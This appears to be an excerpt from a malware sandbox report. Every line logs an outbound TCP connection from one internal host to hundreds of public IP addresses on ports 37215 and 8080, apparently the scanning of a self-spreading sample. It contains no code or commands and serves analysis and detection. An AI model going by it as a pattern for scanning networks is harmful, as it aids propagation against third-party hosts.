            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 213.214.44.70:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 190.192.210.32:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.108.245.181:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.110.152.118:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.136.166.36:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.225.224.36:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 198.26.206.165:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 122.144.132.157:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.38.169.119:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.122.133.208:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 9.66.5.74:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 111.94.24.89:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.5.2.218:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.200.13.167:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 112.183.126.74:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.220.30.52:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.224.109.234:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.162.240.208:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.134.145.99:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.219.68.60:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.153.215.220:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.199.227.47:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.74.229.14:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 95.82.215.76:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.131.141.160:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.222.155.37:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.183.97.78:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.21.227.111:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.210.139.224:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 99.53.154.17:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 152.101.233.53:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.8.134.57:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.112.26.91:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.219.17.253:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 131.133.174.3:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.246.167.199:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.99.226.26:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.36.236.26:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 152.103.93.175:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.44.252.245:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.107.86.77:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.71.102.94:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.29.49.216:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.219.138.187:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 62.17.254.249:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.31.217.26:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.226.148.126:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.8.131.207:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.134.8.174:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 122.36.94.16:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.16.39.89:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.138.68.0:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 188.176.159.84:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.125.195.89:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.224.222.144:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.255.23.48:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.253.130.60:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.226.106.51:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.250.24.160:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.15.142.133:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.161.25.130:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.175.26.206:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.28.220.210:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.240.127.184:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.139.229.186:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.19.130.201:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.151.53.237:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.157.12.229:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 180.178.92.138:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 185.169.33.7:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 213.171.53.20:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.19.190.168:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 216.144.173.95:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.171.78.32:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.254.173.5:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.235.4.43:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.135.28.92:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 153.56.253.229:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 173.57.63.137:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.9.252.168:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.134.157.152:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.45.110.63:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.143.233.108:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.199.132.159:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.115.224.13:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.254.45.144:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 178.236.27.49:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.24.145.38:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.147.116.0:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 61.129.182.169:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 138.242.233.128:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.98.27.130:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.77.129.247:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.21.107.59:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.210.125.144:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 138.61.57.215:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.149.220.231:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.219.67.117:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.65.206.103:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 46.190.110.41:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.59.60.115:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.67.168.56:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 223.217.78.230:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 138.129.89.244:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 176.234.7.214:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 217.176.195.35:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.208.9.66:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 201.69.9.163:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.178.226.153:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.77.220.109:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 146.50.40.77:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.120.106.65:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.113.85.245:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.156.81.162:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.114.60.63:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.223.67.17:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.12.237.169:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 162.87.134.164:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.71.98.217:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.203.109.45:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 179.65.189.175:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 135.89.112.138:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 40.80.111.217:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.205.163.20:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.6.77.44:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.160.78.36:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.6.222.254:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.153.0.125:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.150.2.137:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.146.196.66:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.85.228.249:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.167.81.146:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.72.191.76:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 209.29.253.88:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.53.185.224:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.236.196.161:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.222.91.167:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.77.210.207:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 113.247.143.167:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.200.254.219:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.247.71.98:37215
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 128.122.236.29:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 117.201.220.29:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 115.100.241.54:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 179.191.196.224:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 142.49.121.146:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 110.109.158.8:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 20.186.172.180:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 82.129.42.108:8080
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.106.200.125:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 121.124.200.142:37215
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 2.64.167.104:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 117.254.111.94:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 94.206.241.228:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 165.222.102.90:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 133.141.142.125:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 197.116.199.171:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 24.254.43.164:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 82.21.144.247:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 89.64.134.66:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 58.32.209.48:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 108.143.228.21:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 203.196.23.181:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 206.30.1.110:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 201.249.201.237:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 12.22.111.249:8080
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 118.170.222.8:37215
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 1.53.58.139:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 150.91.93.235:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 92.158.83.53:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 163.155.88.65:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 111.137.153.94:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 141.16.225.179:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 169.88.8.92:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 23.239.188.30:8080
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 134.140.205.217:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.38.33.157:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 97.145.116.186:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.115.36.69:37215
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 179.72.10.23:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 210.75.210.35:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 219.37.247.77:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 143.112.250.235:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 116.126.184.232:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 166.233.20.78:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 67.76.104.75:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 54.45.239.138:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 79.137.118.133:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 44.220.237.50:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 158.231.27.110:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 104.126.225.150:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 70.248.128.190:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 46.231.221.49:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 1.194.10.194:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 79.170.2.234:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 143.149.132.170:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 84.104.116.184:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 116.163.134.62:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 183.229.119.171:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 20.115.245.129:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 82.96.119.185:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 202.244.82.150:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 62.82.91.178:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 170.210.138.213:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 43.27.161.28:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 199.6.116.239:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 154.26.129.111:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 149.150.232.29:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 112.127.238.204:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 150.217.87.189:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 165.219.116.67:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 14.5.22.137:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 95.71.186.24:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 207.109.73.177:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 173.167.0.118:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 193.82.29.174:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 211.38.141.111:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 189.173.81.102:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 100.221.152.245:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 206.232.13.148:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 150.31.44.235:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 196.169.181.208:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 82.137.67.67:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 199.61.239.158:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 82.133.11.184:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 50.92.224.140:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 156.124.194.203:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 195.115.92.150:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 135.72.212.175:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 129.65.231.235:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 13.125.1.65:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 105.117.138.172:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 34.162.29.119:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 44.249.198.171:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 222.211.208.19:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 92.219.143.211:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 173.61.226.110:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 195.181.178.220:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 13.77.39.86:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 203.27.27.140:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 221.251.6.250:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 104.216.46.68:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 9.92.22.243:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 222.11.101.176:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 107.108.159.41:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 66.227.243.159:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 88.119.167.96:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 212.180.237.210:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 143.243.145.70:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 41.56.223.180:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 169.80.186.54:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 90.149.61.23:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 164.123.208.36:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 76.2.223.218:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 18.210.196.156:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 40.210.52.3:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 46.248.62.238:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 109.186.192.85:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 114.167.152.168:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 134.101.15.223:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 212.213.120.238:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 63.157.166.213:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 112.138.1.79:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 51.169.100.220:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 25.161.167.109:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 59.188.40.179:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 99.55.100.96:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 9.210.92.71:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 187.45.199.43:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 20.117.202.213:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 128.202.158.141:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 203.55.89.241:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 164.176.130.162:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 223.193.193.161:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 42.38.109.227:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 175.62.50.71:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 96.139.166.131:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 122.228.241.111:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 141.17.229.55:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 54.225.233.147:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 131.154.207.242:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 111.235.38.15:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 14.14.146.167:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 173.105.224.203:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 161.193.19.36:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 137.138.95.24:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 74.179.198.160:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 156.65.216.188:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 168.193.86.138:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 76.29.163.14:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 107.252.7.131:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 121.165.198.171:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 216.187.10.100:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 139.77.203.191:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 71.41.98.145:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 216.206.15.183:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 203.84.120.208:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 187.29.182.3:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 45.25.161.188:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 101.67.108.208:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 140.3.229.26:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 188.83.82.165:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 142.84.0.162:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 79.97.56.11:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 44.17.133.160:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 40.34.124.112:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 191.182.124.203:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 148.29.87.66:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 92.111.22.29:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 199.113.27.237:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 196.79.66.63:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 193.162.41.7:8080
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.198.132.2:37215
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 112.31.233.228:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 133.224.87.127:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 87.214.112.143:8080
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.92.166.115:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.48.140.96:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.15.180.24:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 170.143.31.147:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.70.14.160:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.218.144.82:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.31.70.156:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 73.244.10.163:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.193.40.158:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.49.244.148:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.253.209.136:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.61.166.212:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.67.79.219:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.247.151.203:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.153.97.90:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.47.96.201:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.178.65.62:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.91.224.123:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.161.107.148:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.58.89.81:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.240.90.195:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.219.199.121:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.178.202.79:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.99.119.190:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.172.200.94:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 87.215.181.121:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.11.19.63:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.80.195.55:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.43.255.76:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.74.19.46:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 197.66.237.220:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 118.139.77.20:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.236.162.70:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 41.88.237.161:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 157.79.173.87:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 187.189.48.45:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 128.85.200.126:37215
            Source: global trafficTCP traffic: 192.168.2.14:15032 -> 177.190.226.100:37215
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 198.138.204.118:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 88.189.186.111:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 36.64.167.77:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 124.236.150.164:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 157.196.137.240:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 187.128.179.79:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 112.168.125.143:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 104.108.148.220:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 74.33.194.236:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 24.119.45.76:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 46.132.72.234:8080
